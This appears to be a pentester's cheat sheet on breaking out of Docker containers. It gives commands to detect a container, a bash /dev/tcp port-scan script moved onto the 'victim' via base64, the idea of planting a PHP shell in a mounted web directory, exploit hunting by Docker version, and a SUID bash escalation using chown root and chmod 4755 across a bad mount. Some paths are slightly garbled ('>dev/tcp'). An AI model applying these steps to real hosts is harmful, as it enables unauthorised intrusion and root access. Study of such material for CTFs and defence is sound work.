Docker Breakeout

We can notice that we are in a Docker container when executing the following commands:

hostname

hostname -I --> We notice that we are not in the victim machine cause the IP is different (172.17.0.0 range)

ifconfig

ifconfig docker0

route -n

mount | grep {directory, example: home}

fdisk -l

df -h

- Enumerate Internal Open Ports

For this we are going to create a basic bash script:

#!/bin/bash
		
function ctrl_c(){
	echo -e "\n\n[!] Exiting …\n"
	tput cnorm; exit 1
}
#Ctrl+C
trap ctrl_c INT

tput civis
for port in $(seq 1 65535); do
	timeout 1 bash -c "echo '' >dev/tcp/{Docker Container IP}/$port" 2>dev/null && echo "[+] Port $port OPEN" &
done; wait
tput cnorm

If we don't have nano or vi in the victim machine we can copy the script with the following commands:

• Attacker

base64 -w 0 port_scan_script.sh | xclip -sel clip

• Victim

echo {Copy the base64 encode script, crtl+shift+c} | base64 -d > port_scan_script.sh

If we don't get new internal open ports maybe there are other containers, so a host discovery script should be run (Tunneling/Pivoting/Methodology w/ Chisel/Host Discovery/Linux), then with the previous script we can enumerate open ports for that new containers.

- Web

If the docker container is mounting a directory in a http server and we have write permisions on it, we can upload a php shell for example to get access to the real machine.

- Version

If we have permisions to create a docker container or we gain access to one, we can check the docker version and search for exploits:

docker --version

- Evil bash

If we are in a docker container as root and we gain access to the real machine as a non-privilege user, if its bad mounted, we can copy /bin/bash in the mounted directory with the non-privilege user and then return back to the container and add suid privileges to the bash.

Non-privilege user in real machine:

cp /bin/bash . (In the mounted directory available in the container)

Root in container:

chown root:root bash

chmod 4755 bash